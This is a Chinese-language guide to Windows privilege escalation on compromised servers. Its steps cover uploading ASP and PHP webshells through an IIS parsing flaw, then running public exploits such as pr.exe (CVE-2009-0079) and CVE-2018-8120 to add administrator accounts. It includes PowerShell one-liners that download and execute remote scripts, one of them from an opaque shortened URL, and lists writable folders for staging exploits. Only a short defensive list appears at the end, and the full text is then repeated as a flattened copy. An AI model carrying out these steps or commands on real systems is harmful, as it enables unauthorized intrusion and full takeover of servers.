Windows操作系统提权全面指南

一、Windows提权基础

0x00 Windows提权方向

内核提权：利用操作系统内核漏洞
数据库提权：利用数据库服务漏洞
应用提权：利用第三方应用程序漏洞
中间人劫持：利用网络通信漏洞

0x01 基础提权命令

系统信息查询：

systeminfo
systeminfo | findstr /B /C:"OS名称" /C:"OS版本"

主机信息：
```
hostname
set  # 查看环境变量
```
用户信息：
```
net user
```

服务信息：

tasklist /svc | find "TermService"
netstat -ano | find "3389"

系统详情：

wmic os get caption  # 系统名
wmic qfe get Description,HotFixID,InstalledOn  # 补丁信息
wmic qfe get Description,HotFixID,InstalledOn | findstr /C:"KB4346084" /C:"KB4509094"  # 特定补丁
wmic product get name,version  # 已安装程序

0x02 常见初始权限

ASP/PHP：匿名权限
ASPX：user权限
JSP：通常为系统权限

0x03 提权前提条件

信息收集：
- 服务器系统和版本位数
- 服务器补丁情况
- 安装软件情况
- 防护软件情况
- 端口开放情况
执行条件：
- 确认能否执行系统命令
- 寻找可写可执行目录
- 根据补丁信息寻找对应exp

0x04 溢出漏洞提权

缓冲区溢出漏洞利用操作系统层漏洞进行权限提升，步骤：

获取shell
收集补丁信息
匹配相应漏洞
执行提权

二、Windows提权实践

0x01 Pr提权实践

环境：IIS6.0存在解析漏洞

步骤：

上传ASP一句话木马
连接webshell
检查用户权限（通常无创建用户权限）
检查系统补丁（确认无KB952004）
上传pr.exe执行提权（利用CVE-2009-0079）

0x02 Windows分析工具利用

1. WinSystemHelper

使用方法：

上传bat+txt文件
运行bat查看结果

实践案例：

在RECYCLER文件夹上传工具（通常有写权限）
运行WinSysHelper.bat
根据检测结果选择exp（如2011年漏洞）
执行exp添加管理员用户

2. Sherlock工具

PowerShell脚本，检测本地提权漏洞

使用方法：

# 本地加载
Import-Module Sherlock.ps1

# 远程加载
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

# 检查漏洞
Find-AllVulns

实践案例：

通过PHP木马获取webshell
使用phpspy.php执行命令
上传Sherlock.ps1
检测漏洞（如MS14-058）
上传对应exp执行提权

3. Privesc工具

枚举Windows错误安全配置

使用方法：

# 本地加载
Import-Module .\Privesc.psm1

# 获取函数
Get-Command -Module Privesc

# 检测全部
Invoke-AllChecks

# 命令行执行
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1;Invoke-AllChecks}"

# 远程调用
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://dwz.cn/2vkbfp');Invoke-AllChecks"

# 添加用户
Install-ServiceBinary -ServiceName '服务名' -UserName user -Password password

实践案例：

检测服务配置漏洞
通过Install-ServiceBinary添加用户
将检测结果导出到文件

0x03 提权实战案例

环境：Windows Server 2008

步骤：

上传ASP木马获取webshell
检查权限（无创建用户权限）
使用systeminfo查看系统信息
匹配CVE-2018-8120漏洞
在User/All Users目录上传exp（通常有写权限）
执行提权并创建管理员用户

三、关键目录与技巧

可写目录：
- RECYCLER（回收站）
- User/All Users
- Temp目录
绕过限制技巧：
- 上传cmd.exe替代不可用的系统命令
- 使用phpspy.php等替代webshell执行命令
- 利用IIS解析漏洞上传木马
信息收集重点：
- 精确操作系统版本
- 已安装补丁列表
- 运行的服务列表
- 环境变量设置

四、防御建议

及时安装系统补丁
限制可写目录权限
监控异常进程创建
禁用不必要的服务
使用最小权限原则
定期检查系统配置

通过系统化的信息收集、工具利用和漏洞匹配，可以有效实现Windows系统的权限提升。实际操作中需根据具体环境灵活选择提权路径。

Windows操作系统提权全面指南一、Windows提权基础 0x00 Windows提权方向内核提权：利用操作系统内核漏洞数据库提权：利用数据库服务漏洞应用提权：利用第三方应用程序漏洞中间人劫持：利用网络通信漏洞 0x01 基础提权命令系统信息查询：主机信息：用户信息：服务信息：系统详情： 0x02 常见初始权限 ASP/PHP：匿名权限 ASPX：user权限 JSP：通常为系统权限 0x03 提权前提条件信息收集：服务器系统和版本位数服务器补丁情况安装软件情况防护软件情况端口开放情况执行条件：确认能否执行系统命令寻找可写可执行目录根据补丁信息寻找对应exp 0x04 溢出漏洞提权缓冲区溢出漏洞利用操作系统层漏洞进行权限提升，步骤：获取shell 收集补丁信息匹配相应漏洞执行提权二、Windows提权实践 0x01 Pr提权实践环境：IIS6.0存在解析漏洞步骤：上传ASP一句话木马连接webshell 检查用户权限（通常无创建用户权限）检查系统补丁（确认无KB952004）上传pr.exe执行提权（利用CVE-2009-0079） 0x02 Windows分析工具利用 1. WinSystemHelper 使用方法：上传bat+txt文件运行bat查看结果实践案例：在RECYCLER文件夹上传工具（通常有写权限）运行WinSysHelper.bat 根据检测结果选择exp（如2011年漏洞）执行exp添加管理员用户 2. Sherlock工具 PowerShell脚本，检测本地提权漏洞使用方法：实践案例：通过PHP木马获取webshell 使用phpspy.php执行命令上传Sherlock.ps1 检测漏洞（如MS14-058）上传对应exp执行提权 3. Privesc工具枚举Windows错误安全配置使用方法：实践案例：检测服务配置漏洞通过Install-ServiceBinary添加用户将检测结果导出到文件 0x03 提权实战案例环境：Windows Server 2008 步骤：上传ASP木马获取webshell 检查权限（无创建用户权限）使用systeminfo查看系统信息匹配CVE-2018-8120漏洞在User/All Users目录上传exp（通常有写权限）执行提权并创建管理员用户三、关键目录与技巧可写目录： RECYCLER（回收站） User/All Users Temp目录绕过限制技巧：上传cmd.exe替代不可用的系统命令使用phpspy.php等替代webshell执行命令利用IIS解析漏洞上传木马信息收集重点：精确操作系统版本已安装补丁列表运行的服务列表环境变量设置四、防御建议及时安装系统补丁限制可写目录权限监控异常进程创建禁用不必要的服务使用最小权限原则定期检查系统配置通过系统化的信息收集、工具利用和漏洞匹配，可以有效实现Windows系统的权限提升。实际操作中需根据具体环境灵活选择提权路径。